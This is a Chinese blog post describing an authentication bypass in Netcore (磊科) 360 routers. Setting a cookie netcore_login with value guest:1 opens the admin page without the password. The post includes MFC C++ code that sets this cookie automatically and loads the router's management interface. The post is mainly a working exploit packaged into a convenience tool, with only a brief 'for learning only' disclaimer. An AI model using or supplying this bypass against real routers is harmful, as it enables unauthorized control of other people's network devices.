老爸这里用的是磊科360第二代安全路由器,由于我的手机连不上 WIFI ,因此我需要登录路由器看看,但是我把路由器的密码给忘记了,试了几个可能的密码都没有能登录进去,又不想恢复路由器的默认设置,只能去网上搜索一下看是否有什么方法可以进入路由器,不巧还真的让我给搜索到了。
绕过磊科路由器验证的方法
绕过的方法其实很简单,简单到只是用浏览器就可以解决,方法是:
用浏览器打开磊科路由器的登录页面,然后添加 Cookie ,Cookie 的键为 netcore_login ,值为 guest:1 ,然后刷新页面就可以进入路由器的管理页面了。
我不知道这个漏洞影响该路由器的多少版本,但是我试过之后的确可以进去。具体的操作方法就不记录,浏览器的 F12 就可以搞定了。截图看一下效果:
代码实现
方法不复杂,但是每次设置还是比较麻烦,而且也不是每个人都愿意去设置或者会设置,因此写一个简单的程序出来。
打开 VS 2012 创建一个 MFC 项目,然后在项目中放置一个 Microsoft Web Browser 控件,将控件关联一个变量,名为 m_webCtrl 。再添加一个 编辑框 和一个 按钮 控件,给该按钮添加一个 单击 事件,代码如下:
1 CString strRouteIp; 2 GetDlgItemText(IDC_ROUTE_IP, strRouteIp); 3 4 if ( strRouteIp.GetLength() == 0 ) 5 { 6 MessageBox("请输入IP地址"); 7 return ; 8 } 9 10 InternetSetCookieEx(strRouteIp, "netcore_login", "guest:1", INTERNET_COOKIE_HTTPONLY, NULL); 11 m_WebCtrl.Navigate(strRouteIp, NULL, NULL, NULL, NULL);
运行结果如下图所示。
非常的简单~!!!
注:该方法只是用来进行学习,请勿干什么不好的事情!该方法不确定适用于 磊科 路由器的哪些版本。
欢迎大家关注微信公众号:“码农UP2U”